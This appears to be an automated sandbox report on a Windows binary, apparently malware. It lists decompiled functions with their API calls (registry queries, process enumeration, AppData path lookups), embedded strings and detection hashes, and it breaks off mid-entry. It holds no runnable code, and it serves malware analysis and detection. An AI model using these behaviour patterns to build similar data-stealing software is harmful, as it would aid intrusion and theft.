                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: 4a7a5f31478039f2d5c92e3ea21d7c05d3dcfec1e85c07007f90f05f74e822f3
                            • Instruction ID: 6b361a289245315bc98162fa1abe8229b26c169f2f29bad6c3e8468c58d8f85b
                            • Opcode Fuzzy Hash: 4a7a5f31478039f2d5c92e3ea21d7c05d3dcfec1e85c07007f90f05f74e822f3
                            • Instruction Fuzzy Hash: 5A21D0B1518341EF8354DF69D88599FBBF8AFD8315F409E1EF599C3260E73095048BA2
                            Function 00143300 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00143336
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0014333D
                            • RegOpenKeyExA.ADVAPI32(80000002,013EC1B0,00000000,00020119,?), ref: 0014335C
                            • RegQueryValueExA.ADVAPI32(?,013FDAB8,00000000,00000000,00000000,000000FF), ref: 00143377
                            • RegCloseKey.ADVAPI32(?), ref: 00143381
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: c6f5933585b12a7383150e07ae9a320ad3574c4eb2f0e9983551d1dc644806de
                            • Instruction ID: bd7d23cd109755de547d187860b73ffd36f16e8608db2ce68f6c546998c4da8f
                            • Opcode Fuzzy Hash: c6f5933585b12a7383150e07ae9a320ad3574c4eb2f0e9983551d1dc644806de
                            • Instruction Fuzzy Hash: 331182B2A40304AFD711CB94ED45FABB77CFB88712F00412AFA05E3290DB7459008BA1
                            Function 00128980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00128996
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A3E5
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 001289CD
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 591cd722b6c1c71917493d65090189fb5bd6ce07ae2136170540e7d53cbf1b68
                            • Instruction ID: 0e59dbfec5b2217654c6e5d893c299ec19117f1229f0d00c3cf97d3cc2d71e22
                            • Opcode Fuzzy Hash: 591cd722b6c1c71917493d65090189fb5bd6ce07ae2136170540e7d53cbf1b68
                            • Instruction Fuzzy Hash: 8C21D8323012608BCB209A6CF850A7AF7999BA1765B15093FF151CB681CF71DCA1C3E5
                            Function 00128850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00128883
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 5eb0af6db07f51cdb3695313ad1b377d7c6d4b7acc0f2a05c4c749056aa8fda8
                            • Instruction ID: ce3dbc26b1446d04ca1a4737af3296f56a43165cfda36fce8a73b79ceed7ee2f
                            • Opcode Fuzzy Hash: 5eb0af6db07f51cdb3695313ad1b377d7c6d4b7acc0f2a05c4c749056aa8fda8
                            • Instruction Fuzzy Hash: 8531DBB5E005159FCB08DF58D8906ADBBB6EB98310F14C269E915DF384DB30AD51CBD1
                            Function 00145B20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00145B32
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00145B45
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 29f306b868286d9d88b862b5a584f374608e91a392bb19f11453a419e983394a
                            • Instruction ID: 431448422c13c82a07bbfa2c9becb6ba42eacc18c80f899c891393fa110578ac
                            • Opcode Fuzzy Hash: 29f306b868286d9d88b862b5a584f374608e91a392bb19f11453a419e983394a
                            • Instruction Fuzzy Hash: 58115E31304B508FC7318E2CE810B1AB7E3EBD2721F250B6DE4A18B7A6D761D84587A1
                            Function 00143E90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0014A640,000000FF), ref: 00143EF0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00143EF7
                            • wsprintfA.USER32 ref: 00143F07
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: f62c968300c8609a997fe4e3bdb00673a1490e2425acf4a7ad76590c9772f956
                            • Instruction ID: cda8b30c41a1bc6ad0d3b6d3f9ec02b1eca4c5edcb0773d06630368c2e05bbc2
                            • Opcode Fuzzy Hash: f62c968300c8609a997fe4e3bdb00673a1490e2425acf4a7ad76590c9772f956
                            • Instruction Fuzzy Hash: 5901D271640310FFE7215B54DC0AF6BBB6CFB45B62F000516FE05972E0D7B41800C6A1
                            Function 00128710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00128737
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 9ff41698f0e667dbffdab6539dfd9995bf662069dcb96b45747fea5f3ee11b44
                            • Instruction ID: da7ca47a41962362b46e7e534c0f1a5d1f2adeb75a96640214c9bebada60ba04
                            • Opcode Fuzzy Hash: 9ff41698f0e667dbffdab6539dfd9995bf662069dcb96b45747fea5f3ee11b44
                            • Instruction Fuzzy Hash: 81F02437F000310F8308643DAC800AEB94757E039033AC724E81AEF399EE30EC9281D0
                            Function 00143C20 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00143C66
                            • Process32First.KERNEL32(00000000,00000128), ref: 00143C79
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00143C8F
                              • Part of subcall function 00147520: lstrlen.KERNEL32(------,00125BEB), ref: 0014752B
                              • Part of subcall function 00147520: lstrcpy.KERNEL32(00000000), ref: 0014754F
                              • Part of subcall function 00147520: lstrcat.KERNEL32(?,------), ref: 00147559
                              • Part of subcall function 00147490: lstrcpy.KERNEL32(00000000), ref: 001474BE
                            • CloseHandle.KERNEL32(00000000), ref: 00143DC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4baaa74ac101e878aa68e8b8726fb7a683eae98a914fe37ca314e406565f1fb2
                            • Instruction ID: 652abf8bc3978e45ef3308f63c94cdf71054973de019fca907d5c8ab7dab8cda
                            • Opcode Fuzzy Hash: 4baaa74ac101e878aa68e8b8726fb7a683eae98a914fe37ca314e406565f1fb2
                            • Instruction Fuzzy Hash: A581F470901215CFCB15CF58D948B95B7F5BB44329F29C1AAD418AB2F2D7369E86CF80
                            Function 0013E6E0 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013E724
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E753
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E761
                            • lstrcat.KERNEL32(?,013FD978), ref: 0013E77C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 1955121f1c29c1c8a8e5e80367bc2c234ccf84b590deb08c1fc2a5deb1cd954c
                            • Instruction ID: d4f5af07ab19db2e18ffb9332f931e16d660ca7e56fc7ab740483eec210bd046
                            • Opcode Fuzzy Hash: 1955121f1c29c1c8a8e5e80367bc2c234ccf84b590deb08c1fc2a5deb1cd954c
                            • Instruction Fuzzy Hash: D151A576A10228AFCB55EB54EC43EEE33BDFB58301F044599F90997291DF70AE858B90
                            Function 001421A0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 001421AF, 001421C5, 00142287
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 834336696a9341deaa00ad1821247489f63f77ff9dd0827ffb93adaa91b8e719
